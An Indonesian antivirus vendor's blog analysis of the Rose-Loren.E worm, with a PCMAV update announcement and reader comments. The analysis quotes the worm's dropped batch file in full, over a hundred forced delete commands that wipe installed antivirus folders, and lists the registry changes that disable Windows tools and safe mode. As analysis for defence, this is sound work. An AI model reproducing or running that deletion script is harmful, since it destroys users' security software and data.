Home > Analisa Virus, Antivirus, Pengumuman > Rose-Loren.E:’Rose’ Ada karena ‘Cinta’

Rose-Loren.E:’Rose’ Ada karena ‘Cinta’

February 24th, 2011 Leave a comment Go to comments

Rose-Loren.E

Rose-Loren.E. Tidak selamanya dunia malware itu terkesan hitam dan jahat. Karena Rose-Loren dan salah satu variannya yang di bahas kali ini lebih mengesankan kepiluan serta rasa kesedihan yang dirasakan oleh pembuatnya. Jika bunga mawar umumnya mencirikan perasaan cinta, Rose-Loren membuat bunga mawar sebagai tanda kedatangannya.

A. Info Malware
Nama: Rose-Loren.E
Asal: Indonesia
Ukuran File: 91.7 KB (93,961 bytes)
Packer : Unknown
Pemrograman : Visual Basic
Icon : Folder Windows
Tipe : Worm

B. Tentang Malware
Sepertinya ini adalah hasil dari modifikasi dari source terdahulu karena sudah cukup lama kami mendapatkan variant dari Rose-Loren. eSetelah di unpack, worm ini berukuran 216 KB (221,696 bytes). Saat worm ini aktif di memory, komputer akan terasa lambat karena proses Rose-Loren.E menyita resource yang cukup besar.

C. Companion/File yang dibuat
Saat aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:

  • Membuat file yang merupakan file induk/host dari worm, yaitu
    C:\WINDOWS\system32\[5 buah bilangan acak]\lsass.exe dan
    C:\WINDOWS\system32\[5 buah bilangan acak]\svchost.exe
  • Membuat juga file dengan nama EpIoler dan autoexec.bat di folder yang sama seperti di atas, dan isinya adalah:
    del /f /q /s  C:\ESET\*.* >nul
    del /f /q /s  C:\antivi~1\*.* >nul
    del /f /q /s  C:\antivi~2\*.* >nul
    del /f /q /s  C:\antiviru\*.* >nul
    del /f /q /s  C:\avg\*.* >nul
    del /f /q /s  C:\kasper~1\*.* >nul
    del /f /q /s  C:\kasper~2\*.* >nul
    del /f /q /s  C:\mcafee\*.* >nul
    del /f /q /s  C:\mcafee.com\agent\*.* >nul
    del /f /q /s  C:\mcafee.com\*.* >nul
    del /f /q /s  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s  C:\mcafee~1\*.* >nul
    del /f /q /s  C:\msav\*.* >nul
    del /f /q /s  C:\norman\*.* >nul
    del /f /q /s  C:\norton~1\*.* >nul
    del /f /q /s  C:\norton~2\*.* >nul
    del /f /q /s  C:\pav\*.* >nul
    del /f /q /s  C:\pccill~1\*.* >nul
    del /f /q /s  C:\iolo\*.* >nul
    del /f /q /s  C:\progra~1\ESET\*.* >nul
    del /f /q /s  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s  C:\progra~1\avg\*.* >nul
    del /f /q /s  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s  C:\progra~1\mcafee\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\agent\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\VSO\*.* >nul
    del /f /q /s  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s  C:\progra~1\norman\*.* >nul
    del /f /q /s  C:\progra~1\norton~1\*.* >nul
    del /f /q /s  C:\progra~1\norton~2\*.* >nul
    del /f /q /s  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:h  C:\ESET\*.* >nul
    del /f /q /s /a:h  C:\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\antiviru\*.* >nul
    del /f /q /s /a:h  C:\avg\*.* >nul
    del /f /q /s /a:h  C:\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\mcafee\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:h  C:\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\msav\*.* >nul
    del /f /q /s /a:h  C:\norman\*.* >nul
    del /f /q /s /a:h  C:\norton~1\*.* >nul
    del /f /q /s /a:h  C:\norton~2\*.* >nul
    del /f /q /s /a:h  C:\pav\*.* >nul
    del /f /q /s /a:h  C:\pccill~1\*.* >nul
    del /f /q /s /a:h  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:h  C:\iolo\*.* >nul
    del /f /q /s /a:h  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:h  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:R  C:\ESET\*.* >nul
    del /f /q /s /a:R  C:\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\antiviru\*.* >nul
    del /f /q /s /a:R  C:\avg\*.* >nul
    del /f /q /s /a:R  C:\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\mcafee\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\msav\*.* >nul
    del /f /q /s /a:R  C:\norman\*.* >nul
    del /f /q /s /a:R  C:\norton~1\*.* >nul
    del /f /q /s /a:R  C:\norton~2\*.* >nul
    del /f /q /s /a:R  C:\pav\*.* >nul
    del /f /q /s /a:R  C:\pccill~1\*.* >nul
    del /f /q /s /a:R  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:R  C:\iolo\*.* >nul
    del /f /q /s /a:R  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:R  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\iolo\*.* >nul
    
  • Jika ditemukan folder WinRar pada folder Program Files, maka Rose-Loren akan langsung mengcopykan file data.exe data.exe dan file gambar rose.jpg.
    Rose-Loren.E - Image Rose
  • Membuat file dengan nama private.zip yang isinya file worm dengan nama data.exe pada setiap drive termasuk di flash disk.
  • Membuat file dengan nama myrose.html, dan di dalamnya tersisip pesan berupa puisi cinta yang akan terlihat jika membuka code htmlnya.Rose-Loren.E - HTMLRose-Loren.E - View Source
  • Merubah icon pada flash disk karena adanya file autorun.inf serta file desktop.ini yang merubah background flash disk menjadi bunga mawar. Yang berbeda adalah, biasanya, autorun.inf lebih berfungsi untuk memanggil file companion dari malware yang ada di flash disk, sedangkan Rose-Loren hanya membuat autorun untuk merubah icon flash disk.Rose-Loren.E - Flash DiskRose-Loren.E - Autorun

D. Hasil Infeksi

Worm ini banyak melakukan perubahan pada registry, terlihat pada Legal Notification sebelum tampilan logon screen yang selalu berubah ubah karena Rose-Loren.E melakukan random terhadap kalimat yang di injeksikan ke registry. Sebagai contoh adalah gambar ini:

Rose-Loren.E - Logon

Text yang dirandom adalah:

  • Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
  • Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti orang lain
  • Mahkota kemanusiaan ialah rendah hati
  • Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang
  • Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya yaitu baik dan burukmu
  • Sabar adalah jalan keluar bagi orang yang tidak bisa menemukan jalan keluar.
  • Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon.
  • Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sejuta makna
  • Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu.
  • Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL.
  • Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.
  • Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier
  • Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.
  • Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda
  • Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
  • Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.
  • Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan.
  • Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak
  • Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.
  • Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan.
  • Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu kesalahan lagi. – Confucius
  • Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.
  • Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari (Saidia Ali)
  • Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.
  • Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
  • Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
  • Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.
  • Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
  • Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.
  • Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.
  • Cinta tidak berupa tatapan satu sama lain, tetapi memandang ke luar bersama ke arah yang sama.
  • Persahabatan sering berakhir dengan cinta Tetapi cinta tidak pernah berakhir dengan persahabatan
  • Cobalah bernalar tentang cinta dan engkau pun akan kehilangan nalarmu
  • Jangan pernah bilang ‘Cinta’ kalau kamu tidak perduli.
  • Jangan pernah menyentuh hidup seseorang kalau hal itu akan melukai hatinya.
  • Jangan pernah menatap matanya kalau semua yang kamu lakukan hanya berbohong.

Worm juga menghilangkan beberapa menu pada Folder Options.

Rose-Loren.E - Folder Options

Payload lainnya adalah merubah tampilan properties pada My Computers.

Rose-Loren.E - System

Beberapa registry juga diubah, termasuk mendisable beberapa sistem Windows.

  • Regedit.exe
  • Msconfig.exe
  • taskmgr.exe
  • ntvdm.exe
  • rstrui.exe
  • EnableExtensions
  • FolderContentsInfoTip
  • NoRun
  • NoFind
  • DisableCurrentUserRun
  • HideFileExt
  • FolderSizeTip
  • ShowFullPathAddress
  • ShowFullPath
  • Disable SafeMode
  • Disable Show Hidden and Super Hidden files.

Worm juga akan membuat startup dengan nama WinUp dan RsWin.
E. Pembersihan

Mulai PCMAV 4.7 Update Build1, Rose-Loren.E beserta file-file companionnya telah dapat dikenali dan dibersihkan dari sistem komputer Anda.

Rose-Loren.E - Detected

PCMAV 4.7 Update Build1

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.7 Update Build1 telah hadir dengan penambahan 72 pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.7, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:

SendSpace.com

ZippyShare.com (mirror)

Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 4.7 Update Build1:
AlamarPica.vbs
AnitaLoroaji
AnitaLoroaji.inf
Autoit-Cyrillic
Autoit-ReplaceIcon.D
Autoit-ReplaceIcon.E
Autoit-ReplaceIcon.F
Autoit.FD
Autoit.FD.ini
Autoit.FE
Autoit.FE.serv
Cobax.exe.C
Dhoos
Dhoos.dll
Dhoos.url.A
Dhoos.url.B
Dhoos.url.C
FakeAV
FakeAV-Downloader.K
FakeAV-Downloader.K.dat
FakeAV-Downloader.K.dll.A
FakeAV-Downloader.K.dll.B
FakeAV-Downloader.K.dll.C
FakeAV-Downloader.K.job
FakeAV-Downloader.K.lnk.A
FakeAV-Downloader.K.lnk.B
FakeAV-Downloader.K.lnk.C
FakeAV-Downloader.K.lnk.D
FakeAV-Downloader.K.ref
FakeAV-Downloader.K.rtf
FakeAV-Downloader.K.setup
FakeAV-Downloader.K.unins
FakeAV-Downloader.K.url
Fakhricker.vbs
Gabest.B
GavGent-HVM31
GXRG-Snow.vbs
GXRG-Snow.vbs.host
GXRG-Snow.vbs.inf
GXRG.vbs
GXRG.vbs.inf
H323
H323.bat
KefiUnique.vbs
KefiUnique.vbs.txt
KefiUnique.vbs.upd
Lz32.vbs.B
Lz32.vbs.C
Ossep.vbs
Ossep.vbs.inf
Ramnit.A.Variant
Ramnit.B.Variant
Ramnit.C.Variant
Ramnit.D.Variant
Ramnit.E.Variant
Ronkor.C
Ronkor.C.htt
Ronkor.C.txt
Rose-Loren.E
TripleExe
TripleExe.inf
VB-Shortcut-1.lnk
XSample.vbs
XSample.vbs.inf
XSample.vbs.ini
XSample.vbs.lnk.A
XSample.vbs.lnk.B
XSample.vbs.lnk.C
XSample.vbs.lnk.D
XSample.vbs.lnk.E
XSample.vbs.lnk.F
XSample.vbs.mp3

Categories: Analisa Virus, Antivirus, Pengumuman Tags:
  1. February 28th, 2011 at 15:53 | #1

    untung aja cuma nyerang C:\ hehe
    untung tempatku istall windows di D:\ 🙂

  2. andi
    February 28th, 2011 at 17:22 | #2

    @robz: jangan senang dulu loh, kalau virusnya itu mendeteksi folder windows sama aja bang 😀

    anyway thanks , walaupun secanggihpun virus , susah ditembus kalau seseorang udah mengenal ciri ciri virus pada umumnya, bisa diatasi sendiri tanpa di infeksi 🙂

  3. wizardft
    February 28th, 2011 at 18:05 | #3

    @andi:
    ente mau tau si RobzLabz itu? dia juga seorang virus maker lho.. ,makanya dia cuma komen kaya gitu.

    @Robz: salam hormat gan! 😀

  4. andi
    February 28th, 2011 at 18:44 | #4

    @wizardft : wow keren, maaf komentarku yang sebelumnya, wajar masih pemula sih, walaupun agak mudeng ttg pemograman tapi tidak terlalu lama belajar pemograman terdesak mapel yang laen yang sangat diperioritas pertama.

    keren donk dia 🙂 wow, makin lama makin banyak yang muncul pemograman yang hebat, tetapi yang tidak kusukai virus maker itu adalah kenapa buat virus? itu hanya kepuasan sendiri, ya sih aku maklumi tetapi dia hebat dia juga membuat program yang berguna tetapi masih windows xp, ya masih banyak menggunakan OS itu.

    maaf banyak bicara, matur nuwun udah memberitahukan, ya sih trik itu juga bisa mengavoid virus tetapi tidak semuanya, makasih banyak ya :), mau join ke forum kagak enak karena saya masih pemula 😀

  5. arip
    February 28th, 2011 at 20:22 | #5

    Itu beneran udah bisa updatenya udah bisa bersihin virus Ramnit

  6. edo
    February 28th, 2011 at 22:19 | #6

    @arip:
    Udah bisa bro…. kebetulan punya gue yang varian E… dah bersih total… barusan dicek lagi dah tuntas… mantap banget pcmav ini. silahkan dicoba…

  7. March 1st, 2011 at 09:43 | #7

    aku pake kaspersky internet security 2011 (versi crack) ………. udah nginstallnya rumit …. kendatipun licensenya ngga diblokir karena udah di antipatch …. tapi updatenya selalu gagal ….. plus kinerja kompi jadi buuueeeraaaaaaaaaaaatttt bangettttttt …….. kalo instal pc mav efektif ngga sih? (mengingat pcku tersambung internet setiap saat dan banyak celah)

  8. guillotine
    March 1st, 2011 at 10:59 | #8

    Salo saia sendiri cenderung menggunakan PCMAV untuk membersihkan virus² yang menyebar luas di Indonesia, saia sudah percaya kualitas pembersihan PCMAV sejak ikon PCMAV belum menjadi bebek kuning.
    Banyak kok antivirus gratis yang kualitas PENDETEKSIAN-nya (bukan pembersihan) tidak kalah bagus dengan Kasperksy. Tentunya jangan lupa untuk mengudate database antivirus yg anda gunakan. Dan bila komputer terkoneksi dengan internet, disarankan memakai firewall (ada juga yang gratis)

    NB:
    KIS berat? Di komputer saia 2 proses KIS (avp.exe) HANYA memakan 13k+13k = 26k
    Kalau saia bandingkan dengan ESS yang pernah saia pakai dahulu, jauh berbeda (ekrn.exe bisa memakan 57k)
    Dalam segi performa, serta fitur juga sangat jauh.

  9. ArSip
    March 1st, 2011 at 11:47 | #9

    Makanya pake si Payung Merah cuma 14k..

  10. koplakcoy
    March 1st, 2011 at 17:52 | #10

    Siiiip ArSip….,
    Halah payung merah alias Apira (‘Avira’ by red.) cuma omong doang menurut saya.
    Tidak bisa melakukan cleaning menyeluruh kayak PCMAV atau SMADAV (lbh baik PCMAV, red) dan juga Apira belibet banyak omongnya sukanya ganggu aja.
    Wis pokoke pilih PCMAV wae lah. wis cukup ndaaa!!!
    Atau kalau mau pilih AV lain, pilihlah AVG.
    Mantaaaaaan bener AVG.
    gk nyesel lho kalau elo install sama kayak PCMAV, walaupun AVG beban memory dan cpunya lebih berat.
    sekian dan teremakaseh!

  11. March 1st, 2011 at 21:34 | #11

    @wizardft
    hehe, itu udah 3 tahun yang lalu, ane udah tobat gan .hahahaha

    @andi: kalau di lihat dari scripnya yang del /f /q /s /a:R C:\ESET\*.* >nul dia kan artinya pake cmd buat delete file yang dia benci, ya emang bisa saja mendeteksi folder windows, tapi kayanya yang ini egk deh. coba tanya analisnya. ane juga belum dapet virusnya soalnya (ndak dikira sok tau)

  12. prayitno
    March 2nd, 2011 at 07:16 | #12

    untuk engine clamav bisakah menggunakan library yg diambil dari websitenya sourceforge.net yaitu: clamunrar-i386-0.97.zip dan ClamAV-i386-0.97.zip atau hanya dari websitenya oss.netfarm.it yaitu: clamav-win32-0.97.7z dan Microsoft.VC80.8.0.50727.4053.CRT.x86.7z saja

  13. yo0sa_juragan_virus
    March 2nd, 2011 at 10:29 | #13

    kalo gag ada virus maker perusahaan anti virus juga gag laku… terkadang saya berpikir, apakah virus itu dibuat oleh yang bikin anti virus juga??? maju terus virus maker…

  14. Edo
    March 2nd, 2011 at 21:52 | #14

    Pada awal-awal pcmav (dalam dokumentasinya / readme.txt) selalu direkomendasikan versi dari CLAMAV untuk di-fusion sama PCMAV tapi beberapa versi terakhir kayaknya versinya yang itu-itu aza. Pertanyaannya : apakah CLAMAV dengan versi terbaru sudah pasti “nge-tune” dengan PCMAV atau sebaliknya?

  15. March 3rd, 2011 at 14:33 | #15

    Mohon maaf sebelumnya agak OOT, kemaren Flashdisk saya terserang virus Ramnit.A.Variant Ramnit.B.Variant Ramnit.C.Variant Ramnit.D.Variant Ramnit.E.Variant di warnet sebuah kota di Jabar. Dan setalah di scan dengan PCMAV 4.7 Alhamdulillah sekarang Falsh saya sembuh lagi, akan tetapi Icon Falsh di kompi berbentuk folder bukan berbentuk drive.
    Apa yang salah di falshdisk saya ??

  16. cybercrime
    March 3rd, 2011 at 15:37 | #16

    @Zanikhan
    ya chek lgi flashmu. ad file autorunx gak.or scan registry PCmu lagi… , insyallah bisa kok. met mncoba

  17. March 3rd, 2011 at 15:43 | #17

    @cybercrime
    makasih ya, ntar tak coba lagi

  18. Saprul
    March 3rd, 2011 at 21:50 | #18

    Kok belum bisa nge-clean Sality/Variant M

  19. A.RAHMAN
    March 4th, 2011 at 19:37 | #19

    tingkatkan pcmav!!!!

  20. March 4th, 2011 at 21:00 | #20

    komputer ku kena virus kali ya ?? masa ngetik tulisannya gede kecil .. jadi aneh keyboard sama mouse .. mohon pencerahan ……………

  21. March 5th, 2011 at 17:53 | #21

    Wah kiboo,komputer lo dilembiru aja tuh,pasti manjur… Wek

  22. MRgie
    March 6th, 2011 at 02:22 | #22

    update.vdb di scan pake panda antivirus terdeteksi sebagai virus trojan CI.A yang dibuat oleh hacker tapi offvensif sihhhhh…….????? warning Exploited Virus

  23. brian
    March 6th, 2011 at 14:45 | #23

    update.vdb versi ini juga ke detek trojan sm avg..

  24. March 6th, 2011 at 20:15 | #24

    coba dimasukin ke white list, semacam exception list pada PCMAV..

  25. MRgie
    March 7th, 2011 at 22:29 | #25

    PCMAV 4.7 build-2 pada update.vdb di scan oleh anti virus panda security terdeteksi “Suspicious” saya berharap ..????? PCMAV harus lebih bagus dan sempurna sebagai antivirus kebanggaan Indonesia.

  26. Agan
    March 16th, 2011 at 10:44 | #26

    eh ramnit.b variant kok ga bersih2 kalo pake PCMAV 4.7 build 2??
    C: nya dah discan berkali-kali tp muncul2 lagi…
    ramnit intinya dimana sih??
    trus smua exe bisa dicure ato harus dihapus??

  27. michi
    March 16th, 2011 at 11:49 | #27

    @Agan: kalo dideteksi variant berarti baru tahap deteksi bro, kan ngga ada pilihan cure, cuma quarantine and submit.

  28. sandra
    March 16th, 2011 at 11:52 | #28

    @Agan
    kalo udah kena virus itu, sangat disarankan install ulang dgn memormat drive dimana windowsnya terinstall kk.. soalnya yg sandra tau, kalo virus itu sudah jalan dikomputer kita, virus itu stealth, gak kedeteksi dimana tubuh asli virus yg aktif tsb, dan parahnya kalo udah aktif di komputer, antivirus apapun gak akan berguna..

    untuk saat ini setau sandra pcmav baru bisa mengenali virus tsb, belum bisa membersihkan secara tuntas..

    CMIIW

  29. Agan
    March 17th, 2011 at 09:41 | #29

    aduh IT kampus beternak virus edan!
    kurang asem!!
    pantesan kagak bersih2 ni kompi
    thx atas sarannya!! ^^